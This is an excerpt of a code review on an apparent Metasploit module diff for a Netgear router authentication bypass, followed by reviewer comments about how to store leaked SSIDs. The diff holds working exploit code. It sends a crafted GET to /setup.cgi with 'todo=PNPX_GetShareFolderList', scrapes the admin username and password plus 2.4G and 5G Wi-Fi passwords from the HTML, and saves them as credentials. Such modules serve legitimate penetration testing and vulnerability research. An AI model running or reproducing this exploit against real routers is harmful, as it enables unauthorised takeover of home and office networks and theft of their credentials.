modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb

```diff
@@ -0,0 +1,249 @@
+      return Exploit::CheckCode::Appears
+    elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe('Not a vulnerable router version!')
+    end
+  end
+
+  def run
+    print_status('Attempting to leak the password of the admin user...')
+    res = send_request_cgi(
+      'uri' => '/setup.cgi',
+      'method' => 'GET',
+      'vars_get' => {
+        'next_file' => 'BRS_swisscom_success.html',
+        'x' => 'todo=PNPX_GetShareFolderList'
+      }
+    )
+
+    html_response = res.get_html_document
+    leaked_info_array = []
+    html_response.xpath('//div[@id="passpharse"]/following-sibling::div[@class="right_div"]').map { |node| leaked_info_array << node.text }
+    unless leaked_info_array.include?('admin')
+      fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
+    end
+    wifi_password = leaked_info_array[0]
+    wifi_password_5g = leaked_info_array[1]
+    username = leaked_info_array[2]
+    password = leaked_info_array[3]
+
+    network_names = html_response.xpath('//div[@id="network_name"]/following-sibling::div[@class="right_div"]')
+    if network_names.length < 2
+      print_warning('Application did not respond with an SSID in its response!')
+    else
+      wifi_ssid = network_names[1].text
+    end
+
+    network_names_5g = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()')
+    if network_names_5g.empty?
+      print_warning('Application did not respond with an 5G SSID in its response!')
+    else
+      wifi_ssid_5g = network_names_5g.text
+    end
+
+    if wifi_ssid_5g.empty? || wifi_password_5g.empty?
+      print_warning('5G SSID information contained blank strings, skipping saving this info to the database!')
+    else
+      # Create 5G WiFi credential
+      wifi_data_5g = {
+        origin_type: :import,
+        address: datastore['RHOST'],
+        module_fullname: fullname,
+        workspace_id: myworkspace_id,
+        filename: "wifi_#{wifi_ssid_5g}_creds.txt",
+        private_data: wifi_password_5g,
+        private_type: :password
+      }
+      create_credential(wifi_data_5g)
+    end
+
+    if wifi_ssid.empty? || wifi_password.empty?
+      print_warning('SSID information contained blank strings, skipping saving this info to the database!')
+    else
+      # Create regular WiFi credential
+      wifi_data = {
+        origin_type: :import,
+        address: datastore['RHOST'],
+        module_fullname: fullname,
+        workspace_id: myworkspace_id,
+        filename: "wifi_#{wifi_ssid}_creds.txt",
+        private_data: wifi_password,
```

Comment:
I think storing the SSID as the `public` data may be valuable.
```suggestion
        public: wifi_ssid,
        private_data: wifi_password,
```

Reply:
I think for this function the `username:` option results in the call at https://github.com/rapid7/metasploit-credential/blob/1d2b701e5aa3ca316dc7068cf5b98849fc4349cd/lib/metasploit/credential/creation.rb#L136-L138. I'm not aware of this function taking a `public:` option.

After further discussion we concluded the `username:` option would be appropriate here given the code mentioned above. Will add this in with the next change.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15677/commits/6ed3462517e030138701a56dfd0c8480c6bbab1c